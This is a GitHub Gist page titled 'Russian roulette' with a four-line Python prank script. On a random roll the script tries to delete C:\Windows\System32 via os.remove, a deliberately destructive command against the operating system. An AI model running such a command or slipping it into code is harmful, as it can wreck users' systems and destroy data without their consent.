Created
January 27, 2024 20:04
-
-
Save henriquesebastiao/e7c100c27eadb55d3c78ec86d9572441 to your computer and use it in GitHub Desktop.
Russian roulette
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| import random | |
| import os | |
| if random.randint(0, 6) == 1: | |
| os.remove(r'C:\Windows\System32') |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment